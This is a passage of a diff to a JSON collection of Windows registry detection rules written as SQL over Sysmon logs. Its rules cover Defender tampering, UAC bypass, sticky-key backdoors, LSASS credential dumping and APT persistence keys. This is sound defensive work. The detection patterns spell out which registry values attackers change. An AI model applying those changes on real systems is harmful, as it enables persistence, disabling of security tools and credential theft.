"eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Administrator actions" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1136.001" ], "falsepositives": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_amsi_com_hijack.yml" - }, - { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", - "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" - ], - "filename": "registry_set_persistence_xll.yml" - }, - { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" - ], - "filename": "registry_set_uac_bypass_wmp.yml" - }, - { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" - ], - "filename": "registry_set_disable_macroruntimescanscope.yml" - }, - { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" - ], - "filename": "registry_set_timeproviders_dllname.yml" - }, - { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "falsepositives": [ - "Software using weird folders for updates" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_run_key_img_folder.yml" - }, - { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE 